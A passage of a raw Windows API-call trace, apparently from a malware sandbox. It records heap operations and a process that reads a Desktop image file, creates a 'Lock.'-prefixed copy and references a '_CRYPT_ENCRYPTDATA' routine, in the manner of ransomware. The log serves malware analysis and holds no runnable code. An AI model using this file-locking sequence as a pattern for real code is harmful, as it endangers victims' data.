RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0147.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0147.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0147.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0147.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0147.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0147.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0147.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0147.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0147.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0147.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0147.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0147.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/E-SkW-EYmoA5t.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\e-skw-eymoa5t.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0147.567] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.568] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0147.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0147.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0147.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0147.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0147.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0147.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.569] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0147.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0147.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0147.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0147.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0147.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.E-SkW-EYmoA5t.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.e-skw-eymoa5t.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0147.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0147.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0147.681] TranslateMessage (lpMsg=0x8cf708) returned 0 [0147.681] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0147.682] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0147.682] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0147.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0147.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0147.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0147.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0147.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0147.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0147.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0147.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ded020 [0147.687] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0147.687] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x6d89, lpOverlapped=0x0) returned 1 [0147.690] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0147.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0147.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x3bf0050 [0147.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ded020 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0147.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0147.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x2f14010 [0147.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0147.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0147.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d89) returned 0x3bf0050 [0147.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0147.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0147.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0147.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0147.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0147.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.700] 